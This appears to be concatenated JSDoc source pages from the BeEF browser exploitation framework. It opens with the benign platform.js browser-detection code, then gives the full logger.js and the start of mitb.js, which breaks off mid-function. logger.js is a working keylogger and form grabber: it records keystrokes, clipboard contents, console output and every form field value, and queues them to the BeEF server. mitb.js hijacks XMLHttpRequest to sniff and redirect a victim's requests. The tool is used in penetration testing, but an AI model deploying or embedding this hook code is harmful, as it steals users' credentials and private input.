// Detect iOS.
else if (/^iP/.test(product)) {
name || (name = 'Safari');
os = 'iOS' + ((data = / OS ([\d_]+)/i.exec(ua))
? ' ' + data[1].replace(/_/g, '.')
: '');
}
// Detect Kubuntu.
else if (name == 'Konqueror' && !/buntu/i.test(os)) {
os = 'Kubuntu';
}
// Detect Android browsers.
else if ((manufacturer && manufacturer != 'Google' &&
((/Chrome/.test(name) && !/\bMobile Safari\b/i.test(ua)) || /\bVita\b/.test(product))) ||
(/\bAndroid\b/.test(os) && /^Chrome/.test(name) && /\bVersion\//i.test(ua))) {
name = 'Android Browser';
os = /\bAndroid\b/.test(os) ? os : 'Android';
}
// Detect Silk desktop/accelerated modes.
else if (name == 'Silk') {
if (!/\bMobi/i.test(ua)) {
os = 'Android';
description.unshift('desktop mode');
}
if (/Accelerated *= *true/i.test(ua)) {
description.unshift('accelerated');
}
}
// Detect PaleMoon identifying as Firefox.
else if (name == 'PaleMoon' && (data = /\bFirefox\/([\d.]+)\b/.exec(ua))) {
description.push('identifying as Firefox ' + data[1]);
}
// Detect Firefox OS and products running Firefox.
else if (name == 'Firefox' && (data = /\b(Mobile|Tablet|TV)\b/i.exec(ua))) {
os || (os = 'Firefox OS');
product || (product = data[1]);
}
// Detect false positives for Firefox/Safari.
else if (!name || (data = !/\bMinefield\b/i.test(ua) && /\b(?:Firefox|Safari)\b/.exec(name))) {
// Escape the `/` for Firefox 1.
if (name && !product && /[\/,]|^[^(]+?\)/.test(ua.slice(ua.indexOf(data + '/') + 8))) {
// Clear name of false positives.
name = null;
}
// Reassign a generic name.
if ((data = product || manufacturer || os) &&
(product || manufacturer || /\b(?:Android|Symbian OS|Tablet OS|webOS)\b/.test(os))) {
name = /[a-z]+(?: Hat)?/i.exec(/\bAndroid\b/.test(os) ? os : data) + ' Browser';
}
}
// Add Chrome version to description for Electron.
else if (name == 'Electron' && (data = (/\bChrome\/([\d.]+)\b/.exec(ua) || 0)[1])) {
description.push('Chromium ' + data);
}
// Detect non-Opera (Presto-based) versions (order is important).
if (!version) {
version = getVersion([
'(?:Cloud9|CriOS|CrMo|Edge|EdgA|EdgiOS|FxiOS|IEMobile|Iron|Opera ?Mini|OPiOS|OPR|Raven|SamsungBrowser|Silk(?!/[\\d.]+$))',
'Version',
qualify(name),
'(?:Firefox|Minefield|NetFront)'
]);
}
// Detect stubborn layout engines.
if ((data =
layout == 'iCab' && parseFloat(version) > 3 && 'WebKit' ||
/\bOpera\b/.test(name) && (/\bOPR\b/.test(ua) ? 'Blink' : 'Presto') ||
/\b(?:Midori|Nook|Safari)\b/i.test(ua) && !/^(?:Trident|EdgeHTML)$/.test(layout) && 'WebKit' ||
!layout && /\bMSIE\b/i.test(ua) && (os == 'Mac OS' ? 'Tasman' : 'Trident') ||
layout == 'WebKit' && /\bPlayStation\b(?! Vita\b)/i.test(name) && 'NetFront'
)) {
layout = [data];
}
// Detect Windows Phone 7 desktop mode.
if (name == 'IE' && (data = (/; *(?:XBLWP|ZuneWP)(\d+)/i.exec(ua) || 0)[1])) {
name += ' Mobile';
os = 'Windows Phone ' + (/\+$/.test(data) ? data : data + '.x');
description.unshift('desktop mode');
}
// Detect Windows Phone 8.x desktop mode.
else if (/\bWPDesktop\b/i.test(ua)) {
name = 'IE Mobile';
os = 'Windows Phone 8.x';
description.unshift('desktop mode');
version || (version = (/\brv:([\d.]+)/.exec(ua) || 0)[1]);
}
// Detect IE 11 identifying as other browsers.
else if (name != 'IE' && layout == 'Trident' && (data = /\brv:([\d.]+)/.exec(ua))) {
if (name) {
description.push('identifying as ' + name + (version ? ' ' + version : ''));
}
name = 'IE';
version = data[1];
}
// Leverage environment features.
if (useFeatures) {
// Detect server-side environments.
// Rhino has a global function while others have a global object.
if (isHostType(context, 'global')) {
if (java) {
data = java.lang.System;
arch = data.getProperty('os.arch');
os = os || data.getProperty('os.name') + ' ' + data.getProperty('os.version');
}
if (rhino) {
try {
version = context.require('ringo/engine').version.join('.');
name = 'RingoJS';
} catch(e) {
if ((data = context.system) && data.global.system == context.system) {
name = 'Narwhal';
os || (os = data[0].os || null);
}
}
if (!name) {
name = 'Rhino';
}
}
else if (
typeof context.process == 'object' && !context.process.browser &&
(data = context.process)
) {
if (typeof data.versions == 'object') {
if (typeof data.versions.electron == 'string') {
description.push('Node ' + data.versions.node);
name = 'Electron';
version = data.versions.electron;
} else if (typeof data.versions.nw == 'string') {
description.push('Chromium ' + version, 'Node ' + data.versions.node);
name = 'NW.js';
version = data.versions.nw;
}
}
if (!name) {
name = 'Node.js';
arch = data.arch;
os = data.platform;
version = /[\d.]+/.exec(data.version);
version = version ? version[0] : null;
}
}
}
// Detect Adobe AIR.
else if (getClassOf((data = context.runtime)) == airRuntimeClass) {
name = 'Adobe AIR';
os = data.flash.system.Capabilities.os;
}
// Detect PhantomJS.
else if (getClassOf((data = context.phantom)) == phantomClass) {
name = 'PhantomJS';
version = (data = data.version || null) && (data.major + '.' + data.minor + '.' + data.patch);
}
// Detect IE compatibility modes.
else if (typeof doc.documentMode == 'number' && (data = /\bTrident\/(\d+)/i.exec(ua))) {
// We're in compatibility mode when the Trident version + 4 doesn't
// equal the document mode.
version = [version, doc.documentMode];
if ((data = +data[1] + 4) != version[1]) {
description.push('IE ' + version[1] + ' mode');
layout && (layout[1] = '');
version[1] = data;
}
version = name == 'IE' ? String(version[1].toFixed(1)) : version[0];
}
// Detect IE 11 masking as other browsers.
else if (typeof doc.documentMode == 'number' && /^(?:Chrome|Firefox)\b/.test(name)) {
description.push('masking as ' + name + ' ' + version);
name = 'IE';
version = '11.0';
layout = ['Trident'];
os = 'Windows';
}
os = os && format(os);
}
// Detect prerelease phases.
if (version && (data =
/(?:[ab]|dp|pre|[ab]\d+pre)(?:\d+\+?)?$/i.exec(version) ||
/(?:alpha|beta)(?: ?\d)?/i.exec(ua + ';' + (useFeatures && nav.appMinorVersion)) ||
/\bMinefield\b/i.test(ua) && 'a'
)) {
prerelease = /b/i.test(data) ? 'beta' : 'alpha';
version = version.replace(RegExp(data + '\\+?$'), '') +
(prerelease == 'beta' ? beta : alpha) + (/\d+\+?/.exec(data) || '');
}
// Detect Firefox Mobile.
if (name == 'Fennec' || name == 'Firefox' && /\b(?:Android|Firefox OS)\b/.test(os)) {
name = 'Firefox Mobile';
}
// Obscure Maxthon's unreliable version.
else if (name == 'Maxthon' && version) {
version = version.replace(/\.[\d.]+/, '.x');
}
// Detect Xbox 360 and Xbox One.
else if (/\bXbox\b/i.test(product)) {
if (product == 'Xbox 360') {
os = null;
}
if (product == 'Xbox 360' && /\bIEMobile\b/.test(ua)) {
description.unshift('mobile mode');
}
}
// Add mobile postfix.
else if ((/^(?:Chrome|IE|Opera)$/.test(name) || name && !product && !/Browser|Mobi/.test(name)) &&
(os == 'Windows CE' || /Mobi/i.test(ua))) {
name += ' Mobile';
}
// Detect IE platform preview.
else if (name == 'IE' && useFeatures) {
try {
if (context.external === null) {
description.unshift('platform preview');
}
} catch(e) {
description.unshift('embedded');
}
}
// Detect BlackBerry OS version.
// http://docs.blackberry.com/en/developers/deliverables/18169/HTTP_headers_sent_by_BB_Browser_1234911_11.jsp
else if ((/\bBlackBerry\b/.test(product) || /\bBB10\b/.test(ua)) && (data =
(RegExp(product.replace(/ +/g, ' *') + '/([.\\d]+)', 'i').exec(ua) || 0)[1] ||
version
)) {
data = [data, /BB10/.test(ua)];
os = (data[1] ? (product = null, manufacturer = 'BlackBerry') : 'Device Software') + ' ' + data[0];
version = null;
}
// Detect Opera identifying/masking itself as another browser.
// http://www.opera.com/support/kb/view/843/
else if (this != forOwn && product != 'Wii' && (
(useFeatures && opera) ||
(/Opera/.test(name) && /\b(?:MSIE|Firefox)\b/i.test(ua)) ||
(name == 'Firefox' && /\bOS X (?:\d+\.){2,}/.test(os)) ||
(name == 'IE' && (
(os && !/^Win/.test(os) && version > 5.5) ||
/\bWindows XP\b/.test(os) && version > 8 ||
version == 8 && !/\bTrident\b/.test(ua)
))
) && !reOpera.test((data = parse.call(forOwn, ua.replace(reOpera, '') + ';'))) && data.name) {
// When "identifying", the UA contains both Opera and the other browser's name.
data = 'ing as ' + data.name + ((data = data.version) ? ' ' + data : '');
if (reOpera.test(name)) {
if (/\bIE\b/.test(data) && os == 'Mac OS') {
os = null;
}
data = 'identify' + data;
}
// When "masking", the UA contains only the other browser's name.
else {
data = 'mask' + data;
if (operaClass) {
name = format(operaClass.replace(/([a-z])([A-Z])/g, '$1 $2'));
} else {
name = 'Opera';
}
if (/\bIE\b/.test(data)) {
os = null;
}
if (!useFeatures) {
version = null;
}
}
layout = ['Presto'];
description.push(data);
}
// Detect WebKit Nightly and approximate Chrome/Safari versions.
if ((data = (/\bAppleWebKit\/([\d.]+\+?)/i.exec(ua) || 0)[1])) {
// Correct build number for numeric comparison.
// (e.g. "532.5" becomes "532.05")
data = [parseFloat(data.replace(/\.(\d)$/, '.0$1')), data];
// Nightly builds are postfixed with a "+".
if (name == 'Safari' && data[1].slice(-1) == '+') {
name = 'WebKit Nightly';
prerelease = 'alpha';
version = data[1].slice(0, -1);
}
// Clear incorrect browser versions.
else if (version == data[1] ||
version == (data[2] = (/\bSafari\/([\d.]+\+?)/i.exec(ua) || 0)[1])) {
version = null;
}
// Use the full Chrome version when available.
data[1] = (/\bChrome\/([\d.]+)/i.exec(ua) || 0)[1];
// Detect Blink layout engine.
if (data[0] == 537.36 && data[2] == 537.36 && parseFloat(data[1]) >= 28 && layout == 'WebKit') {
layout = ['Blink'];
}
// Detect JavaScriptCore.
// http://stackoverflow.com/questions/6768474/how-can-i-detect-which-javascript-engine-v8-or-jsc-is-used-at-runtime-in-androi
if (!useFeatures || (!likeChrome && !data[1])) {
layout && (layout[1] = 'like Safari');
data = (data = data[0], data < 400 ? 1 : data < 500 ? 2 : data < 526 ? 3 : data < 533 ? 4 : data < 534 ? '4+' : data < 535 ? 5 : data < 537 ? 6 : data < 538 ? 7 : data < 601 ? 8 : '8');
} else {
layout && (layout[1] = 'like Chrome');
data = data[1] || (data = data[0], data < 530 ? 1 : data < 532 ? 2 : data < 532.05 ? 3 : data < 533 ? 4 : data < 534.03 ? 5 : data < 534.07 ? 6 : data < 534.10 ? 7 : data < 534.13 ? 8 : data < 534.16 ? 9 : data < 534.24 ? 10 : data < 534.30 ? 11 : data < 535.01 ? 12 : data < 535.02 ? '13+' : data < 535.07 ? 15 : data < 535.11 ? 16 : data < 535.19 ? 17 : data < 536.05 ? 18 : data < 536.10 ? 19 : data < 537.01 ? 20 : data < 537.11 ? '21+' : data < 537.13 ? 23 : data < 537.18 ? 24 : data < 537.24 ? 25 : data < 537.36 ? 26 : layout != 'Blink' ? '27' : '28');
}
// Add the postfix of ".x" or "+" for approximate versions.
layout && (layout[1] += ' ' + (data += typeof data == 'number' ? '.x' : /[.+]/.test(data) ? '' : '+'));
// Obscure version for some Safari 1-2 releases.
if (name == 'Safari' && (!version || parseInt(version) > 45)) {
version = data;
}
}
// Detect Opera desktop modes.
if (name == 'Opera' && (data = /\bzbov|zvav$/.exec(os))) {
name += ' ';
description.unshift('desktop mode');
if (data == 'zvav') {
name += 'Mini';
version = null;
} else {
name += 'Mobile';
}
os = os.replace(RegExp(' *' + data + '$'), '');
}
// Detect Chrome desktop mode.
else if (name == 'Safari' && /\bChrome\b/.exec(layout && layout[1])) {
description.unshift('desktop mode');
name = 'Chrome Mobile';
version = null;
if (/\bOS X\b/.test(os)) {
manufacturer = 'Apple';
os = 'iOS 4.3+';
} else {
os = null;
}
}
// Strip incorrect OS versions.
if (version && version.indexOf((data = /[\d.]+$/.exec(os))) == 0 &&
ua.indexOf('/' + data + '-') > -1) {
os = trim(os.replace(data, ''));
}
// Add layout engine.
if (layout && !/\b(?:Avant|Nook)\b/.test(name) && (
/Browser|Lunascape|Maxthon/.test(name) ||
name != 'Safari' && /^iOS/.test(os) && /\bSafari\b/.test(layout[1]) ||
/^(?:Adobe|Arora|Breach|Midori|Opera|Phantom|Rekonq|Rock|Samsung Internet|Sleipnir|Web)/.test(name) && layout[1])) {
// Don't add layout details to description if they are falsey.
(data = layout[layout.length - 1]) && description.push(data);
}
// Combine contextual information.
if (description.length) {
description = ['(' + description.join('; ') + ')'];
}
// Append manufacturer to description.
if (manufacturer && product && product.indexOf(manufacturer) < 0) {
description.push('on ' + manufacturer);
}
// Append product to description.
if (product) {
description.push((/^on /.test(description[description.length - 1]) ? '' : 'on ') + product);
}
// Parse the OS into an object.
if (os) {
data = / ([\d.+]+)$/.exec(os);
isSpecialCasedOS = data && os.charAt(os.length - data[0].length - 1) == '/';
os = {
'architecture': 32,
'family': (data && !isSpecialCasedOS) ? os.replace(data[0], '') : os,
'version': data ? data[1] : null,
'toString': function() {
var version = this.version;
return this.family + ((version && !isSpecialCasedOS) ? ' ' + version : '') + (this.architecture == 64 ? ' 64-bit' : '');
}
};
}
// Add browser/OS architecture.
if ((data = /\b(?:AMD|IA|Win|WOW|x86_|x)64\b/i.exec(arch)) && !/\bi686\b/i.test(arch)) {
if (os) {
os.architecture = 64;
os.family = os.family.replace(RegExp(' *' + data), '');
}
if (
name && (/\bWOW64\b/i.test(ua) ||
(useFeatures && /\w(?:86|32)$/.test(nav.cpuClass || nav.platform) && !/\bWin64; x64\b/i.test(ua)))
) {
description.unshift('32-bit');
}
}
// Chrome 39 and above on OS X is always 64-bit.
else if (
os && /^OS X/.test(os.family) &&
name == 'Chrome' && parseFloat(version) >= 39
) {
os.architecture = 64;
}
ua || (ua = null);
/*------------------------------------------------------------------------*/
/**
* The platform object.
*
* @memberof platform
* @type Object
*/
var platform = {};
/**
* The platform description.
*
* @memberOf platform
* @type string|null
*/
platform.description = ua;
/**
* The name of the browser's layout engine.
*
* The list of common layout engines include:
* "Blink", "EdgeHTML", "Gecko", "Trident" and "WebKit"
*
* @memberOf platform
* @type string|null
*/
platform.layout = layout && layout[0];
/**
* The name of the product's manufacturer.
*
* The list of manufacturers include:
* "Apple", "Archos", "Amazon", "Asus", "Barnes & Noble", "BlackBerry",
* "Google", "HP", "HTC", "LG", "Microsoft", "Motorola", "Nintendo",
* "Nokia", "Samsung" and "Sony"
*
* @memberOf platform
* @type string|null
*/
platform.manufacturer = manufacturer;
/**
* The name of the browser/environment.
*
* The list of common browser names include:
* "Chrome", "Electron", "Firefox", "Firefox for iOS", "IE",
* "Microsoft Edge", "PhantomJS", "Safari", "SeaMonkey", "Silk",
* "Opera Mini" and "Opera"
*
* Mobile versions of some browsers have "Mobile" appended to their name:
* eg. "Chrome Mobile", "Firefox Mobile", "IE Mobile" and "Opera Mobile"
*
* @memberOf platform
* @type string|null
*/
platform.name = name;
/**
* The alpha/beta release indicator.
*
* @memberOf platform
* @type string|null
*/
platform.prerelease = prerelease;
/**
* The name of the product hosting the browser.
*
* The list of common products include:
*
* "BlackBerry", "Galaxy S4", "Lumia", "iPad", "iPod", "iPhone", "Kindle",
* "Kindle Fire", "Nexus", "Nook", "PlayBook", "TouchPad" and "Transformer"
*
* @memberOf platform
* @type string|null
*/
platform.product = product;
/**
* The browser's user agent string.
*
* @memberOf platform
* @type string|null
*/
platform.ua = ua;
/**
* The browser/environment version.
*
* @memberOf platform
* @type string|null
*/
platform.version = name && version;
/**
* The name of the operating system.
*
* @memberOf platform
* @type Object
*/
platform.os = os || {
/**
* The CPU architecture the OS is built for.
*
* @memberOf platform.os
* @type number|null
*/
'architecture': null,
/**
* The family of the OS.
*
* Common values include:
* "Windows", "Windows Server 2008 R2 / 7", "Windows Server 2008 / Vista",
* "Windows XP", "OS X", "Ubuntu", "Debian", "Fedora", "Red Hat", "SuSE",
* "Android", "iOS" and "Windows Phone"
*
* @memberOf platform.os
* @type string|null
*/
'family': null,
/**
* The version of the OS.
*
* @memberOf platform.os
* @type string|null
*/
'version': null,
/**
* Returns the OS string.
*
* @memberOf platform.os
* @returns {string} The OS string.
*/
'toString': function() { return 'null'; }
};
platform.parse = parse;
platform.toString = toStringPlatform;
if (platform.version) {
description.unshift(version);
}
if (platform.name) {
description.unshift(name);
}
if (os && name && !(os == String(os).split(' ')[0] && (os == name.split(' ')[0] || product))) {
description.push(product ? '(' + os + ')' : 'on ' + os);
}
if (description.length) {
platform.description = description.join(' ');
}
return platform;
}
/*--------------------------------------------------------------------------*/
// Export platform.
var platform = parse();
// Some AMD build optimizers, like r.js, check for condition patterns like the following:
if (typeof define == 'function' && typeof define.amd == 'object' && define.amd) {
// Expose platform on the global object to prevent errors when platform is
// loaded by a script tag in the presence of an AMD loader.
// See http://requirejs.org/docs/errors.html#mismatch for more details.
root.platform = platform;
// Define as an anonymous module so platform can be aliased through path mapping.
define(function() {
return platform;
});
}
// Check for `exports` after `define` in case a build optimizer adds an `exports` object.
else if (freeExports && freeModule) {
// Export for CommonJS support.
forOwn(platform, function(value, key) {
freeExports[key] = value;
});
}
else {
// Export to the global object.
root.platform = platform;
}
}.call(this));
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/logger.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: logger.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: logger.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Provides logging capabilities.
* @namespace beef.logger
*/
beef.logger = {
running: false,
/**
* Internal logger id
*/
id: 0,
/**
* Holds events created by user, to be sent back to BeEF
*/
events: [],
/**
* Holds current stream of key presses
*/
stream: [],
/**
* Contains current target of key presses
*/
target: null,
/**
* Holds the time the logger was started
*/
time: null,
/**
* Holds the event details to be sent to BeEF
*/
e: function() {
this.id = beef.logger.get_id();
this.time = beef.logger.get_timestamp();
this.type = null;
this.x = 0;
this.y = 0;
this.target = null;
this.data = null;
this.mods = null;
},
/**
* Prevents from recursive event handling on form submission
*/
in_submit: false,
/**
* Starts the logger
*/
start: function() {
beef.browser.hookChildFrames();
this.running = true;
var d = new Date();
this.time = d.getTime();
$j(document).off('keypress');
$j(document).off('click');
$j(window).off('focus');
$j(window).off('blur');
$j('form').off('submit');
$j(document.body).off('copy');
$j(document.body).off('cut');
$j(document.body).off('paste');
if (!!window.console && typeof window.console == "object") {
try {
var oldInfo = window.console.info;
console.info = function (message) {
beef.logger.console('info', message);
oldInfo.apply(console, arguments);
};
var oldLog = window.console.log;
console.log = function (message) {
beef.logger.console('log', message);
oldLog.apply(console, arguments);
};
var oldWarn = window.console.warn;
console.warn = function (message) {
beef.logger.console('warn', message);
oldWarn.apply(console, arguments);
};
var oldDebug = window.console.debug;
console.debug = function (message) {
beef.logger.console('debug', message);
oldDebug.apply(console, arguments);
};
var oldError = window.console.error;
console.error = function (message) {
beef.logger.console('error', message);
oldError.apply(console, arguments);
};
} catch(e) {}
}
$j(document).keypress(
function(e) { beef.logger.keypress(e); }
).click(
function(e) { beef.logger.click(e); }
);
$j(window).focus(
function(e) { beef.logger.win_focus(e); }
).blur(
function(e) { beef.logger.win_blur(e); }
);
$j('form').submit(
function(e) {
beef.logger.submit(e);
}
);
$j(document.body).on('copy', function() {
setTimeout("beef.logger.copy();", 10);
});
$j(document.body).on('cut', function() {
setTimeout("beef.logger.cut();", 10);
});
$j(document.body).on('paste', function() {
beef.logger.paste();
});
},
/**
* Stops the logger
*/
stop: function() {
this.running = false;
clearInterval(this.timer);
$j(document).off('keypress');
$j(document).off('click');
$j(window).off('focus');
$j(window).off('blur');
$j('form').off('submit');
$j(document.body).off('copy');
$j(document.body).off('cut');
$j(document.body).off('paste');
// TODO: reset console
},
/**
* Get id
*/
get_id: function() {
this.id++;
return this.id;
},
/**
* Click function fires when the user clicks the mouse.
*/
click: function(e) {
var c = new beef.logger.e();
c.type = 'click';
c.x = e.pageX;
c.y = e.pageY;
c.target = beef.logger.get_dom_identifier(e.target);
this.events.push(c);
},
/**
* Fires when the window element has regained focus
*/
win_focus: function(e) {
var f = new beef.logger.e();
f.type = 'focus';
this.events.push(f);
},
/**
* Fires when the window element has lost focus
*/
win_blur: function(e) {
var b = new beef.logger.e();
b.type = 'blur';
this.events.push(b);
},
/**
* Keypress function fires everytime a key is pressed.
* @param {Object} e: event object
*/
keypress: function(e) {
if (this.target == null || ($j(this.target).get(0) !== $j(e.target).get(0)))
{
beef.logger.push_stream();
this.target = e.target;
}
this.stream.push({'char':e.which, 'modifiers': {'alt':e.altKey, 'ctrl':e.ctrlKey, 'shift':e.shiftKey}});
},
/**
* Copy function fires when the user copies data to the clipboard.
*/
copy: function(x) {
try {
var c = new beef.logger.e();
c.type = 'copy';
c.data = clipboardData.getData("Text");
this.events.push(c);
} catch(e) {}
},
/**
* Cut function fires when the user cuts data to the clipboard.
*/
cut: function() {
try {
var c = new beef.logger.e();
c.type = 'cut';
c.data = clipboardData.getData("Text");
this.events.push(c);
} catch(e) {}
},
/**
* Console function fires when data is sent to the browser console.
*/
console: function(type, message) {
try {
var c = new beef.logger.e();
c.type = 'console';
c.data = type + ': ' + message;
this.events.push(c);
} catch(e) {}
},
/**
* Paste function fires when the user pastes data from the clipboard.
*/
paste: function() {
try {
var c = new beef.logger.e();
c.type = 'paste';
c.data = clipboardData.getData("Text");
this.events.push(c);
} catch(e) {}
},
/**
* Submit function fires whenever a form is submitted
* TODO: Cleanup this function
*/
submit: function(e) {
if (beef.logger.in_submit) {
return true;
}
try {
var f = new beef.logger.e();
f.type = 'submit';
f.target = beef.logger.get_dom_identifier(e.target);
var jqForms = $j(e.target);
var values = jqForms.find('input').map(function() {
var inp = $j(this);
return inp.attr('name') + '=' + inp.val();
}).get().join();
beef.debug('submitting form inputs: ' + values);
/*
for (var i = 0; i < e.target.elements.length; i++) {
values += "["+i+"] "+e.target.elements[i].name+"="+e.target.elements[i].value+"\n";
}
*/
f.data = 'Action: '+jqForms.attr('action')+' - Method: '+$j(e.target).attr('method') + ' - Values:\n'+values;
this.events.push(f);
this.queue();
this.target = null;
beef.net.flush(function done() {
beef.debug("Submitting the form");
beef.logger.in_submit = true;
jqForms.submit();
beef.logger.in_submit = false;
beef.debug("Done submitting");
});
e.preventDefault();
return false;
} catch(e) {}
},
/**
* Pushes the current stream to the events queue
*/
push_stream: function() {
if (this.stream.length > 0)
{
this.events.push(beef.logger.parse_stream());
this.stream = [];
}
},
/**
* Translate DOM Object to a readable string
*/
get_dom_identifier: function(target) {
target = (target == null) ? this.target : target;
var id = '';
if (target)
{
id = target.tagName.toLowerCase();
id += ($j(target).attr('id')) ? '#'+$j(target).attr('id') : ' ';
id += ($j(target).attr('name')) ? '('+$j(target).attr('name')+')' : '';
}
return id;
},
/**
* Formats the timestamp
* @return {String} timestamp string
*/
get_timestamp: function() {
var d = new Date();
return ((d.getTime() - this.time) / 1000).toFixed(3);
},
/**
* Parses stream array and creates history string
*/
parse_stream: function() {
var s = '';
var mods = '';
for (var i in this.stream){
try{
var mod = this.stream[i]['modifiers'];
s += String.fromCharCode(this.stream[i]['char']);
if(typeof mod != 'undefined' &&
(mod['alt'] == true ||
mod['ctrl'] == true ||
mod['shift'] == true)){
mods += (mod['alt']) ? ' [Alt] ' : '';
mods += (mod['ctrl']) ? ' [Ctrl] ' : '';
mods += (mod['shift']) ? ' [Shift] ' : '';
mods += String.fromCharCode(this.stream[i]['char']);
}
}catch(e){}
}
var k = new beef.logger.e();
k.type = 'keys';
k.target = beef.logger.get_dom_identifier();
k.data = s;
k.mods = mods;
return k;
},
/**
* Queue results to be sent back to framework
*/
queue: function() {
beef.logger.push_stream();
if (this.events.length > 0)
{
beef.net.queue('/event', 0, this.events);
this.events = [];
}
}
};
beef.regCmp('beef.logger');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/mitb.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: mitb.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: mitb.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* @namespace beef.mitb
*/
beef.mitb = {
cid:null,
curl:null,
/** Initializes */
init:function (cid, curl) {
beef.mitb.cid = cid;
beef.mitb.curl = curl;
/*Override open method to intercept ajax request*/
var hook_file = "<%= @hook_file %>";
if (window.XMLHttpRequest && !(window.ActiveXObject)) {
beef.mitb.sniff("Method XMLHttpRequest.open override");
(function (open) {
XMLHttpRequest.prototype.open = function (method, url, async, mitb_call) {
// Ignore it and don't hijack it. It's either a request to BeEF (hook file or Dynamic Handler)
// or a request initiated by the MiTB itself.
if (mitb_call || (url.indexOf(hook_file) != -1 || url.indexOf("/dh?") != -1)) {
open.call(this, method, url, async, true);
}else {
var portRegex = new RegExp(":[0-9]+");
var portR = portRegex.exec(url);
var requestPort;
if (portR != null) { requestPort = portR[0].split(":")[1]; }
//GET request
if (method == "GET") {
//GET request -> cross-origin
if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
window.open(url);
}else { //GET request -> same-origin
beef.mitb.sniff("GET [Ajax Request]: " + url);
if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
var title = "";
if (document.getElementsByTagName("title").length == 0) {
title = document.title;
} else {
title = document.getElementsByTagName("title")[0].innerHTML;
}
// write the url of the page
history.pushState({ Be:"EF" }, title, url);
}
}
}else{
//POST request
beef.mitb.sniff("POST ajax request to: " + url);
open.call(this, method, url, async, true);
}
}
};
})(XMLHttpRequest.prototype.open);
}
},
/** Initializes the hook on anchors and forms. */
hook:function () {
beef.onpopstate.push(function (event) {
